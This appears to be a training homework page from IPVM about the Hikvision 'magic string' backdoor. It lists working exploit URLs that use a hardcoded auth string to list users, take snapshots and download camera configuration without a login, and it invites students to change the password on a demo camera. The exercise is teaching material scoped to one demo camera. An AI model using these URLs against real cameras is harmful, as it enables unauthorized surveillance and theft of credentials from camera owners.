Hack Our Camera!
This week we discussed cyber security and hacking. One of the most recent and widespread backdoor exploits is the Hikvision magic string. In this homework assignment you will access a Hikvision camera running vulnerable firmware.
IPVM has put a vulnerable Hikvision camera online for members to experiment with. Access details are:
http://hikvisionbackdoor.dyndns.org [NOTE: will show login page with strong admin password]. However due to the backdoor exploit actors can now execute Hikvision CGI commands by simply appending a string that authorizes access to the camera. Some examples are below (replace "camera.ip" with the actual IP address or URL to the camera):
Retrieve a list of all users and their roles:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
Obtain a camera snapshot without authentication:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
And worst of all, one can download camera configuration:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
You can also use an app that was developed to change the password. See how creative you can get with this (without disabling the camera) and post your results here!
Post Your Results
Here is an example of what homework submissions should look like.
I used the app to change the password:
With access to the camera I then changed the OSD:
Please do not attempt this on any camera other than our demo camera, and keep results professional. If you have any questions please let us know - we are happy to help.